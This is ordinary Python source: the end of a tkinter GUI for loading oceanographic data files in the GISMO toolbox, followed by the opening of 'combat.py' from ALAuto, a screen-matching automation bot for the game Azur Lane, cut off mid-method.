self.button_get_ferrybox_data_file = tk.Button(frame_data, text='Ferrybox CMEMS',
command=lambda: self._get_data_file_path('Ferrybox CMEMS'))
self.button_get_fixed_platform_data_file = tk.Button(frame_data, text='Fixed platform CMEMS',
command=lambda: self._get_data_file_path('Fixed platforms CMEMS'))
self.button_get_ctd_data_file = tk.Button(frame_data, text='DV CTD standard format',
command=lambda: self._get_data_file_paths('CTD DV'))
self.button_get_ctd_nodc_data_file = tk.Button(frame_data, text='NODC CTD standard format',
command=lambda: self._get_data_file_paths('CTD NODC'))
self.button_get_sampling_file = tk.Button(frame_data, text='SHARKweb bottle data',
command=lambda: self._get_data_file_path('PhysicalChemical SHARK'))
# tkw.disable_widgets(self.button_get_ctd_data_file)
self.stringvar_data_file = tk.StringVar()
self.entry_data_file = tk.Entry(frame_data, textvariable=self.stringvar_data_file, state='disabled')
# Grid
padx=5
pady=5
self.button_get_ferrybox_data_file.grid(row=0, column=0, padx=padx, pady=pady, sticky='nsew')
self.button_get_fixed_platform_data_file.grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
self.button_get_ctd_data_file.grid(row=0, column=2, padx=padx, pady=pady, sticky='nsew')
self.button_get_ctd_nodc_data_file.grid(row=0, column=3, padx=padx, pady=pady, sticky='nsew')
self.button_get_sampling_file.grid(row=0, column=4, padx=padx, pady=pady, sticky='nsew')
self.entry_data_file.grid(row=1, column=0, columnspan=5, padx=padx, pady=pady, sticky='nsew')
# Grid configure
tkw.grid_configure(frame_data, nr_rows=2, nr_columns=5)
# Settings frame
self.combobox_widget_settings_file = tkw.ComboboxWidget(frame_settings,
items=[],
title='',
callback_target=self._save_type_and_file,
prop_combobox={'width': 40},
column=0,
columnspan=1,
row=0,
sticky='nsew')
self._update_settings_combobox_widget()
self.button_import_settings_file = ttk.Button(frame_settings, text='Import settings file', command=self._import_settings_file)
self.button_import_settings_file.grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
tkw.grid_configure(frame_settings, nr_rows=1, nr_columns=2)
#----------------------------------------------------------------------
# Sampling type frame
self.combobox_widget_sampling_type = tkw.ComboboxWidget(frame_sampling_type,
items=sorted(self.session.get_sampling_types()),
title='',
callback_target=self._save_type_and_file,
prop_combobox={'width': 30},
column=0,
columnspan=1,
row=0,
sticky='nsew')
# Platform depth frame
self.entry_widget_platform_depth = tkw.EntryWidget(frame_platform_depth, entry_type='int',
prop_entry=dict(width=5), row=0, column=0,
padx=padx, pady=pady, sticky='nsew')
self.entry_widget_platform_depth.disable_widget()
tk.Label(frame_platform_depth, text='meters').grid(row=0, column=1, padx=padx, pady=pady, sticky='nsew')
tkw.grid_configure(frame_platform_depth)
# Gridconfigure
tkw.grid_configure(frame_sampling_type)
# Load file button
self.button_load_file = tk.Button(frame_load, text='Load file', command=self._load_file, bg='lightgreen', font=(30))
self.button_load_file.grid(row=0, column=0, padx=padx, pady=pady, sticky='nsew')
self.button_load_file.configure(state='disabled')
tkw.grid_configure(frame_load)
def _update_settings_combobox_widget(self):
self.combobox_widget_settings_file.update_items(self.settings_files.get_list())
#===========================================================================
def _set_frame_loaded_files(self):
"""
Created 20180821
"""
frame = self.frame_loaded
prop_listbox = {'height': 4}
self.listbox_widget_loaded_files = tkw.ListboxWidget(frame,
include_delete_button=False,
# include_delete_button='Remove source',
prop_listbox=prop_listbox,
callback_delete_button=self._delete_source,
padx=1,
pady=1)
tkw.grid_configure(frame)
def _delete_source(self, file_id, *args, **kwargs):
file_id = file_id.split(':')[-1].strip()
self.session.remove_file(file_id)
self.update_all()
def _get_data_file_paths(self, sampling_type):
open_directory = self.get_open_directory(sampling_type)
file_paths = filedialog.askopenfilenames(initialdir=open_directory,
filetypes=[('GISMO-file ({})'.format(sampling_type), '*.txt')])
if file_paths:
self.set_open_directory(file_paths[0], sampling_type)
self.combobox_widget_sampling_type.set_value(sampling_type)
file_path_list = []
for nr, file_path in enumerate(file_paths):
file_name = os.path.basename(file_path)
if sampling_type == 'CTD DV' and not file_name.startswith('ctd_profile_'):
continue
if sampling_type == 'CTD NODC' and not file_name.startswith('nodc_ctd_profile_'):
continue
else:
if nr == 0:
file_path_list.append(file_path)
else:
file_path_list.append(file_name)
if not file_path_list:
self.logger.info(f'No files matches file name convention for sampling_type "{sampling_type}"')
self.main_app.update_help_information(f'No files matches file name convention for sampling_type "{sampling_type}"')
self.stringvar_data_file.set('; '.join(file_path_list))
self._set_settings(sampling_type, file_paths[0])
def _get_data_file_path(self, sampling_type):
"""
Created 20180821
"""
open_directory = self.get_open_directory(sampling_type)
file_path = filedialog.askopenfilename(initialdir=open_directory,
filetypes=[('GISMO-file ({})'.format(sampling_type), '*.txt')])
if file_path:
self.set_open_directory(file_path, sampling_type)
self.combobox_widget_sampling_type.set_value(sampling_type)
self.stringvar_data_file.set(file_path)
self._set_settings(sampling_type, file_path)
def _save_type_and_file(self):
if not self.latest_loaded_sampling_type:
return
s_type = self.combobox_widget_sampling_type.get_value()
if s_type:
self.user.file_type.set(self.latest_loaded_sampling_type, 'sampling_type', s_type)
s_file = self.combobox_widget_settings_file.get_value()
if s_file:
self.user.file_type.set(self.latest_loaded_sampling_type, 'settings_file', s_file)
def _set_settings(self, sampling_type, file_path):
if file_path:
self.latest_loaded_sampling_type = sampling_type
s_type = self.user.file_type.setdefault(sampling_type, 'sampling_type', '')
if s_type:
self.combobox_widget_sampling_type.set_value(s_type)
# Settings file
s_file = self.user.file_type.setdefault(sampling_type, 'settings_file', '')
if s_file:
self.combobox_widget_settings_file.set_value(s_file)
self.info_popup.show_information(core.texts.data_file_selected(username=self.user.name))
if 'fixed platform' in sampling_type.lower():
self.entry_widget_platform_depth.enable_widget()
temp_file_id = os.path.basename(file_path)[:10]
depth = self.user.sampling_depth.setdefault(temp_file_id, 1)
self.entry_widget_platform_depth.set_value(depth)
else:
self.entry_widget_platform_depth.set_value('')
self.entry_widget_platform_depth.disable_widget()
self.button_load_file.configure(state='normal')
else:
self.button_load_file.configure(state='disabled')
self.entry_widget_platform_depth.set_value('')
self.entry_widget_platform_depth.disable_widget()
def _import_settings_file(self):
open_directory = self.get_open_directory()
file_path = filedialog.askopenfilename(initialdir=open_directory,
filetypes=[('GISMO Settings file', '*.ini')])
if not file_path:
return
self.set_open_directory(file_path)
self.settings_files.import_file(file_path)
self._update_settings_combobox_widget()
def get_open_directory(self, suffix=None):
if suffix:
string = f'open_directory_{suffix.replace(" ", "_")}'
else:
string = 'open_directory'
return self.user.path.setdefault(string, self.user_manager.get_app_settings('directory', 'input directory'))
def set_open_directory(self, directory, suffix=None):
if os.path.isfile(directory):
directory = os.path.dirname(directory)
if suffix:
string = f'open_directory_{suffix.replace(" ", "_")}'
else:
string = 'open_directory'
self.user.path.set(string, directory)
def _load_file(self):
def load_file(data_file_path, **kwargs):
self.main_app.update_help_information('')
self.button_load_file.configure(state='disabled')
settings_file = self.combobox_widget_settings_file.get_value()
sampling_type = self.combobox_widget_sampling_type.get_value()
self.session.load_file(sampling_type=sampling_type,
data_file_path=data_file_path,
settings_file=settings_file,
# settings_file_path=settings_file_path,
reload=False,
root_directory=self.root_directory,
**kwargs)
# self.reset_help_information()
data_file_path = self.stringvar_data_file.get()
settings_file = self.combobox_widget_settings_file.get_value()
settings_file_path = self.settings_files.get_path(settings_file)
# sampling_type = self.combobox_widget_sampling_type.get_value()
if not all([data_file_path, settings_file_path]):
self.main_app.update_help_information('No file selected!', fg='red')
return
data_file_path = self.stringvar_data_file.get()
if ';' in data_file_path:
data_file_list = []
directory = None
for k, file_name in enumerate(data_file_path.split(';')):
file_name = file_name.strip()
if k == 0:
directory = os.path.dirname(file_name)
data_file_list.append(file_name)
else:
data_file_list.append(os.path.join(directory, file_name))
else:
data_file_list = [data_file_path]
for file_path in data_file_list:
# Load file
try:
load_file(file_path)
# self.run_progress(load_file, message='Loading file...please wait...')
except GISMOExceptionMissingPath as e:
self.logger.debug(e)
main_gui.show_information('Invalid path',
'The path "{}" given in i settings file "{} can not be found'.format(e.message,
settings_file_path))
self.main_app.update_help_information('Please try again with a different settings file.')
except GISMOExceptionMissingInputArgument as e:
self.logger.debug(e)
if 'depth' in e.message:
platform_depth = self.entry_widget_platform_depth.get_value()
if not platform_depth:
main_gui.show_information('No depth found!',
'You need to provide platform depth for this sampling type!')
return
load_file(file_path, depth=platform_depth)
except GISMOExceptionInvalidParameter as e:
self.logger.debug(e)
main_gui.show_information('Invalid parameter',
f'Could not find parameter {e}. Settings file might have wrong information.')
return
except GISMOExceptionQCfieldError:
main_gui.show_error('QC field error',
f'Something is wrong with the qf columns in file: {file_path}')
return
except Exception as e:
self.logger.debug(e)
main_gui.show_internal_error(e)
return
self.stringvar_data_file.set('')
self._update_loaded_files_widget()
self.update_all()
self.button_load_file.configure(state='normal')
self.main_app.update_help_information('File loaded! Please continue.', bg='green')
def _update_loaded_files_widget(self):
loaded_files = []
for sampling_type in self.session.get_sampling_types():
for file_id in self.session.get_file_id_list(sampling_type):
loaded_files.append('{}: {}'.format(sampling_type, file_id))
self.listbox_widget_loaded_files.update_items(loaded_files)
def get_loaded_files_list(self):
"""
Returns a list with the items in self.listbox_widget_loaded_files
:return:
"""
return self.listbox_widget_loaded_files.items[:]
#===========================================================================
def _quick_run_F1(self, event):
try:
self.show_frame(main_gui.PageCTD)
except:
pass
#===========================================================================
def _quick_run_F2(self, event):
pass
#===========================================================================
def _quick_run_F3(self, event):
pass
#===========================================================================
def activate_binding_keys(self):
"""
Load binding keys
"""
self.bind("<Home>", lambda event: self.show_frame(gui.PageStart))
self.bind("<Escape>", lambda event: self.show_frame(gui.PageStart))
self.bind("<F1>", self._quick_run_F1)
self.bind("<F2>", self._quick_run_F2)
self.bind("<F3>", self._quick_run_F3)
def add_working_indicator(self):
pass
# self.update_help_information(u'Loading...')
# self.working_indicator = tk.Label(self, text=u'Loading...',
# fg=u'red',
# font=("Helvetica", 16, u'italic'))
# self.working_indicator.grid(row=0, column=0)
def delete_working_indicator(self):
pass
# self.update_help_information(None)
# self.working_indicator.destroy()
# def update_help_information(self, text='', **kwargs):
# """
# Created 20180822
# """
# kw = dict(bg=self.cget('bg'),
# fg='black')
# kw.update(kwargs)
# self.info_widget.set_text(text, **kw)
# self.logger.debug(text)
# def reset_help_information(self):
# """
# Created 20180822
# """
# self.info_widget.reset()
def update_all(self):
for page_name, frame in self.frames.items():
if self.pages_started.get(page_name):
print('page_name', page_name)
frame.update_page()
#===========================================================================
def show_frame(self, page_name):
"""
This method brings the given Page to the top of the GUI.
Before "raise" call frame startup method.
This is so that the Page only loads ones.
"""
load_page = True
frame = self.frames[page_name]
if not self.pages_started.get(page_name, None):
frame.startup()
self.pages_started[page_name] = True
#-----------------------------------------------------------------------
if load_page:
frame.tkraise()
self.previous_page = self.active_page
self.active_page = page
# Check page history
if page in self.page_history:
self.page_history.pop()
self.page_history.append(page)
self.update_page()
def _show_frame(self, page):
self.withdraw()
# self._show_frame(page)
self.run_progress_in_toplevel(lambda x=page: self._show_frame(x), 'Opening page, please wait...')
self.deiconify()
# def show_frame(self, page):
# """
# This method brings the given Page to the top of the GUI.
# Before "raise" call frame startup method.
# This is so that the Page only loads ones.
# """
# # if page == PageAdmin and not self.admin_mode:
# # page = PagePassword
#
# load_page = True
# frame = self.frames[page]
#
# self.withdraw()
# title = self._get_title(page)
# if not self.pages_started[page]:
# frame.startup()
# self.pages_started[page] = True
#
#
# frame.update_page()
# # try:
# # frame.update()
# # except:
# # Log().information(u'%s: Could not update page.' % title)
#
# #-----------------------------------------------------------------------
# if load_page:
# frame.tkraise()
# tk.Tk.wm_title(self, u'GISMO Toolbox: %s' % title)
# self.previous_page = self.active_page
# self.active_page = page
#
# # Check page history
# if page in self.page_history:
# self.page_history.pop()
# self.page_history.append(page)
#
#
# try:
# if self.active_page == gui.PageCTD:
# self.notebook_load.select_frame('CTD files')
#
# except:
# pass
#
# self.update()
# self.deiconify()
#===========================================================================
def goto_previous_page(self, event):
self.page_history
if self.previous_page:
self.show_frame(self.previous_page)
#===========================================================================
def previous_page(self, event):
self.page_history.index(self.active_page)
#===========================================================================
def update_app(self):
"""
Updates all information about loaded series.
"""
self.update_all()
#===========================================================================
def quit_toolbox(self):
if self.settings.settings_are_modified:
save_settings = tkMessageBox.askyesnocancel(u'Save core.Settings?',
u"""
You have made one or more changes to the
toolbox settings during this session.
Do you want to change these changes permanent?
""")
if save_settings==True:
self.settings.save_settings()
self.settings.settings_are_modified = False
else:
return
self.destroy() # Closes window
self.quit() # Terminates program
#===========================================================================
def _get_title(self, page):
if page in self.titles:
return self.titles[page]
else:
return ''
#===========================================================================
def _create_titles(self):
self.titles = {}
try:
self.titles[gui.PageFerrybox] = 'Ferrybox'
except:
pass
try:
self.titles[gui.PageFixedPlatforms] = 'Buoy'
except:
pass
try:
self.titles[gui.PageProfile] = 'Profiles'
except:
pass
try:
self.titles[gui.PageTimeSeries] = 'Time Series'
except:
pass
|
combat.py
|
import math
import string
from datetime import datetime, timedelta
from util.logger import Logger
from util.utils import Region, Utils
from scipy import spatial
from threading import Thread
class CombatModule(object):
def __init__(self, config, stats, retirement_module, enhancement_module):
"""Initializes the Combat module.
Args:
config (Config): ALAuto Config instance.
stats (Stats): ALAuto Stats instance.
retirement_module (RetirementModule): ALAuto RetirementModule instance.
enhancement_module (EnhancementModule): ALAuto EnhancementModule instance.
"""
self.enabled = True
self.config = config
self.stats = stats
self.retirement_module = retirement_module
self.enhancement_module = enhancement_module
self.chapter_map = self.config.combat['map']
Utils.small_boss_icon = config.combat['small_boss_icon']
self.exit = 0
self.combats_done = 0
self.enemies_list = []
self.mystery_nodes_list = []
self.blacklist = []
self.movement_event = {}
self.kills_count = 0
self.kills_before_boss = {
'1-1': 1, '1-2': 2, '1-3': 2, '1-4': 3,
'2-1': 2, '2-2': 3, '2-3': 3, '2-4': 3,
'3-1': 3, '3-2': 3, '3-3': 3, '3-4': 3,
'4-1': 3, '4-2': 3, '4-3': 3, '4-4': 4,
'5-1': 4, '5-2': 4, '5-3': 4, '5-4': 4,
'6-1': 4, '6-2': 4, '6-3': 4, '6-4': 5,
'7-1': 5, '7-2': 5, '7-3': 5, '7-4': 5,
'8-1': 4, '8-2': 4, '8-3': 4, '8-4': 4,
'9-1': 5, '9-2': 5, '9-3': 5, '9-4': 5,
'10-1': 6, '10-2': 6, '10-3': 6, '10-4': 6,
'11-1': 6, '11-2': 6, '11-3': 6, '11-4': 6,
'12-1': 6, '12-2': 6, '12-3': 6, '12-4': 6,
'13-1': 6, '13-2': 6, '13-3': 6, '13-4': 7
}
if self.chapter_map not in self.kills_before_boss:
# check if current map is present in the dictionary and if it isn't,
# a new entry is added with kills_before_boss value
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
elif self.config.combat['kills_before_boss'] != 0:
# updates default value with the one provided by the user
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
self.region = {
'fleet_lock': Region(1790, 750, 130, 30),
'open_strategy_menu': Region(1797, 617, 105, 90),
'disable_subs_hunting_radius': Region(1655, 615, 108, 108),
'close_strategy_menu': Region(1590, 615, 40, 105),
'menu_button_battle': Region(1517, 442, 209, 206),
'map_summary_go': Region(1289, 743, 280, 79),
'fleet_menu_go': Region(1485, 872, 270, 74),
'combat_ambush_evade': Region(1493, 682, 208, 56),
'combat_com_confirm': Region(848, 740, 224, 56),
'combat_end_confirm': Region(1520, 963, 216, 58),
'combat_dismiss_surface_fleet_summary': Region(790, 950, 250, 65),
'menu_combat_start': Region(1578, 921, 270, 70),
'tap_to_continue': Region(661, 840, 598, 203),
'close_info_dialog': Region(1326, 274, 35, 35),
'dismiss_ship_drop': Region(1228, 103, 692, 735),
'retreat_button': Region(1130, 985, 243, 60),
'dismiss_commission_dialog': Region(1065, 732, 235, 68),
'normal_mode_button': Region(88, 990, 80, 40),
'map_nav_right': Region(1831, 547, 26, 26),
'map_nav_left': Region(65, 547, 26, 26),
'event_button': Region(1770, 250, 75, 75),
'lock_ship_button': Region(1086, 739, 200, 55),
'clear_second_fleet': Region(1690, 473, 40, 40),
'button_switch_fleet': Region(1430, 985, 240, 60),
'menu_nav_back': Region(54, 57, 67, 67)
}
self.swipe_counter = 0
def combat_logic_wrapper(self):
"""Method that fires off the necessary child methods that encapsulates
the entire action of sortieing combat fleets and resolving combat.
Returns:
int: 1 if boss was defeated, 2 if successfully retreated after the specified
number of fights, 3 if morale is too low, 4 if dock is full and unable to
free it and 5 if fleet was defeated.
"""
self.exit = 0
self.start_time = datetime.now()
# enhancecement and retirement flags
enhancement_failed = False
retirement_failed = False
# get to map
map_region = self.reach_map()
Utils.touch_randomly(map_region)
while True:
Utils.wait_update_screen()
if self.exit == 1 or self.exit == 2:
self.stats.increment_combat_done()
time_passed = datetime.now() - self.start_time
if self.stats.combat_done % self.config.combat['retire_cycle'] == 0 or ((self.config.commissions['enabled'] or \
self.config.dorm['enabled'] or self.config.academy['enabled']) and time_passed.total_seconds() > 3600) or \
not Utils.check_oil(self.config.combat['oil_limit']):
break
else:
self.exit = 0
Logger.log_msg("Repeating map {}.".format(self.chapter_map))
Utils.touch_randomly(map_region)
continue
if self.exit > 2:
self.stats.increment_combat_attempted()
break
if Utils.find("combat/button_go", 0.9):
Logger.log_debug("Found map summary go button.")
Utils.touch_randomly(self.region["map_summary_go"])
Utils.wait_update_screen()
if Utils.find("combat/menu_fleet") and (lambda x:x > 414 and x < 584)(Utils.find("combat/menu_fleet").y) and not self.config.combat['boss_fleet']:
if not self.chapter_map[0].isdigit() and string.ascii_uppercase.index(self.chapter_map[2:3]) < 1 or self.chapter_map[0].isdigit():
Logger.log_msg("Removing second fleet from fleet selection.")
Utils.touch_randomly(self.region["clear_second_fleet"])
if Utils.find("combat/menu_select_fleet"):
Logger.log_debug("Found fleet select go button.")
Utils.touch_randomly(self.region["fleet_menu_go"])
Utils.wait_update_screen(2)
if Utils.find("combat/button_retreat"):
Logger.log_debug("Found retreat button, starting clear function.")
if not self.clear_map():
self.stats.increment_combat_attempted()
break
Utils.wait_update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
# reset enhancement flag
enhancement_failed = False
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
break
if Utils.find("combat/alert_morale_low"):
if self.config.combat['ignore_morale']:
Utils.find_and_touch("menu/button_confirm")
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
break
if Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
Utils.script_sleep(1)
Utils.menu_navigate("menu/button_battle")
return self.exit
def reach_map(self):
"""
Method which returns the map region for the stage set in the configuration file.
If the map isn't found, it navigates the map selection menu to get to the world where the specified map is located.
Only works with standard maps up to worlds 13 and some event maps.
Also checks if hard mode is enabled, and if it's legit to keep it so (event maps C and D).
If nothing is found even after menu navigation, it stops the bot workflow until the user moves to the right
screen or the map asset is substituted with the right one.
Returns:
(Region): the map region of the selected stage.
"""
Utils.wait_update_screen()
# get to map selection menu
if Utils.find("menu/button_battle"):
Logger.log_debug("Found menu battle button.")
Utils.touch_randomly(self.region["menu_button_battle"])
Utils.wait_update_screen(2)
# correct map mode
if not self.chapter_map[0].isdigit():
letter = self.chapter_map[2]
event_maps = ['A', 'B', 'S', 'C', 'D']
Utils.touch_randomly(self.region['event_button'])
Utils.wait_update_screen(1)
if event_maps.index(letter) < 3 and Utils.find("menu/button_normal_mode", 0.8) or \
event_maps.index(letter) > 2 and not Utils.find("menu/button_normal_mode", 0.8):
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
else:
if Utils.find("menu/button_normal_mode"):
Logger.log_debug("Disabling hard mode.")
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
if map_region != None:
Logger.log_msg("Found specified map.")
return map_region
else:
# navigate map selection menu
if not self.chapter_map[0].isdigit():
if (self.chapter_map[2] == 'A' or self.chapter_map[2] == 'C') and \
(Utils.find('maps/map_E-B1', 0.99) or Utils.find('maps/map_E-D1', 0.99)):
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
elif (self.chapter_map[2] == 'B' or self.chapter_map[2] == 'D') and \
(Utils.find('maps/map_E-A1', 0.99) or Utils.find('maps/map_E-C1', 0.99)):
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
else:
_map = 0
for x in range(1, 14):
if Utils.find("maps/map_{}-1".format(x), 0.99):
_map = x
break
if _map != 0:
taps = int(self.chapter_map.split("-")[0]) - _map
for x in range(0, abs(taps)):
if taps >= 1:
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
Utils.script_sleep()
else:
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
Utils.script_sleep()
Utils.wait_update_screen()
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
if map_region == None:
Logger.log_error("Cannot find the specified map, please move to the world where it's located.")
while map_region == None:
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
Utils.wait_update_screen(1)
Logger.log_msg("Found specified map.")
return map_region
def battle_handler(self, boss=False):
Logger.log_msg("Starting combat.")
# enhancecement and retirement flags
enhancement_failed = False
retirement_failed = False
while not (Utils.find("combat/menu_loading", 0.8)):
Utils.update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
self.retreat_handler()
return False
elif Utils.find("combat/alert_morale_low"):
if self.config.combat['ignore_morale']:
Utils.find_and_touch("menu/button_confirm")
else:
self.retreat_handler()
return False
elif Utils.find("combat/combat_pause", 0.7):
Logger.log_warning("Loading screen was not found but combat pause is present, assuming combat is initiated normally.")
break
else:
Utils.touch_randomly(self.region["menu_combat_start"])
Utils.script_sleep(1)
Utils.script_sleep(4)
# flags
in_battle = True
items_received = False
locked_ship = False
confirmed_fight = False
defeat = False
confirmed_fleet_switch = False
while True:
Utils.update_screen()
if in_battle and Utils.find("combat/combat_pause", 0.7):
Logger.log_debug("In battle.")
Utils.script_sleep(2.5)
continue
if not items_received:
if Utils.find("combat/menu_touch2continue"):
Logger.log_debug("Combat ended: tap to continue")
Utils.touch_randomly(self.region['tap_to_continue'])
in_battle = False
continue
if Utils.find("menu/item_found"):
Logger.log_debug("Combat ended: items received screen")
Utils.touch_randomly(self.region['tap_to_continue'])
Utils.script_sleep(1)
continue
if (not locked_ship) and Utils.find("combat/alert_lock"):
Logger.log_msg("Locking received ship.")
Utils.touch_randomly(self.region['lock_ship_button'])
locked_ship = True
continue
if Utils.find("menu/drop_elite"):
Logger.log_msg("Received ELITE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_rare"):
Logger.log_msg("Received new RARE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_ssr"):
Logger.log_msg("Received SSR ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_common"):
Logger.log_msg("Received new COMMON ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
if not in_battle:
if (not confirmed_fight) and Utils.find("combat/button_confirm"):
Logger.log_msg("Combat ended.")
items_received = True
confirmed_fight = True
Utils.touch_randomly(self.region["combat_end_confirm"])
if boss:
return True
Utils.wait_update_screen(3)
if (not confirmed_fight) and Utils.find("combat/commander"):
items_received = True
# prevents fleet with submarines from getting stuck at combat end screen
Utils.touch_randomly(self.region["combat_dismiss_surface_fleet_summary"])
continue
if defeat and not confirmed_fleet_switch:
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
Utils.script_sleep(3)
self.exit = 5
return False
if Utils.find("combat/alert_fleet_cannot_be_formed"):
# fleet will be automatically switched
Utils.touch_randomly(self.region['close_info_dialog'])
confirmed_fleet_switch = True
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
Utils.script_sleep(3)
continue
else:
# flagship sunk, but part of backline still remains
# proceed to retreat
Utils.script_sleep(3)
self.exit = 5
return False
if confirmed_fight and Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if confirmed_fight and Utils.find("combat/button_retreat"):
#Utils.touch_randomly(self.region["hide_strat_menu"])
if confirmed_fleet_switch:
# if fleet was defeated and it has now been switched
return False
else:
# fleet won the fight
self.combats_done += 1
self.kills_count += 1
if self.kills_count >= self.kills_before_boss[self.chapter_map]:
Utils.script_sleep(2.5)
return True
if confirmed_fight and Utils.find_and_touch("combat/defeat_close_button"):
Logger.log_debug("Fleet was defeated.")
defeat = True
Utils.script_sleep(3)
def movement_handler(self, target_info):
"""
Method that handles the fleet movement until it reach its target (mystery node or enemy node).
If the coordinates are wrong, they will be blacklisted and another set of coordinates to work on is obtained.
If the target is a mystery node and what is found is ammo, then the method will fall in the blacklist case
and search for another enemy: this is inefficient and should be improved, but it works.
Args:
target_info (list): coordinate_x, coordinate_y, type. Describes the selected target.
Returns:
(int): 1 if a fight is needed, otherwise 0.
"""
Logger.log_msg("Moving towards objective.")
count = 0
location = [target_info[0], target_info[1]]
Utils.script_sleep(1)
while True:
Utils.update_screen()
event = self.check_movement_threads()
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/button_evade"]:
Logger.log_msg("Ambush was found, trying to evade.")
Utils.touch_randomly(self.region["combat_ambush_evade"])
Utils.script_sleep(0.5)
continue
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/alert_failed_evade"]:
Logger.log_warning("Failed to evade ambush.")
self.kills_count -= 1
Utils.touch_randomly(self.region["menu_combat_start"])
self.battle_handler()
continue
if self.chapter_map[0].isdigit() and event["combat/alert_ammo_supplies"]:
Logger.log_msg("Received ammo supplies")
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if self.chapter_map[0].isdigit() and event["menu/item_found"]:
Logger.log_msg("Item found on node.")
Utils.touch_randomly(self.region['tap_to_continue'])
if Utils.find("combat/menu_emergency"):
Utils.script_sleep(1)
Utils.touch_randomly(self.region["close_strategy_menu"])
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if event["menu/alert_info"]:
Logger.log_debug("Found alert.")
Utils.find_and_touch("menu/alert_close")
continue
if event["combat/menu_loading"]:
self.fleet_location = target_info[0:2]
return 1
elif event["combat/menu_formation"]:
Utils.find_and_touch("combat/auto_combat_off")
self.fleet_location = target_info[0:2]
return 1
else:
if count != 0 and count % 3 == 0:
Utils.touch(location)
if count > 21:
Logger.log_msg("Blacklisting location and searching for another enemy.")
self.blacklist.append(location[0:2])
self.fleet_location = None
location = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
count = 0
count += 1
def unable_handler(self, coords, boss=False):
"""
Method called when the path to the target (boss fleet or mystery node) is obstructed by mobs:
it procedes to switch targets to the mobs which are blocking the path.
Args:
coords (list): coordinate_x, coordinate_y. These coordinates describe the target's location.
"""
if boss:
Logger.log_debug("Unable to reach boss function started.")
else:
Logger.log_debug("Unable to reach selected target function started.")
self.blacklist.clear()
closest_to_unreachable_target = self.get_closest_target(self.blacklist, coords, boss=boss)
Utils.touch(closest_to_unreachable_target)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
Logger.log_warning("Unable to reach next to selected target.")
self.blacklist.append(closest_to_unreachable_target[0:2])
while True:
closest_enemy = self.get_closest_target(self.blacklist)
Utils.touch(closest_enemy)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
self.blacklist.append(closest_enemy[0:2])
else:
break
self.movement_handler(closest_enemy)
if not self.battle_handler():
return False
return True
else:
self.movement_handler(closest_to_unreachable_target)
if not self.battle_handler():
return False
return True
def retreat_handler(self):
""" Retreats if necessary.
"""
while True:
Utils.wait_update_screen(2)
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
continue
if Utils.find("menu/button_sort"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
continue
if Utils.find("combat/menu_formation"):
Utils.touch_randomly(self.region["menu_nav_back"])
continue
if Utils.find("combat/button_retreat"):
Utils.touch_randomly(self.region['retreat_button'])
continue
if Utils.find("menu/button_confirm"):
Utils.touch_randomly(self.region['combat_com_confirm'])
continue
if Utils.find("menu/attack"):
if self.exit != 1 and self.exit != 2 and self.exit != 5:
Logger.log_msg("Retreating...")
return
def clear_map(self):
""" Clears map.
"""
self.fleet_location = None
self.combats_done = 0
self.kills_count = 0
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.swipe_counter = 0
Logger.log_msg("Started map clear.")
Utils.script_sleep(2.5)
while Utils.find("combat/fleet_lock", 0.99):
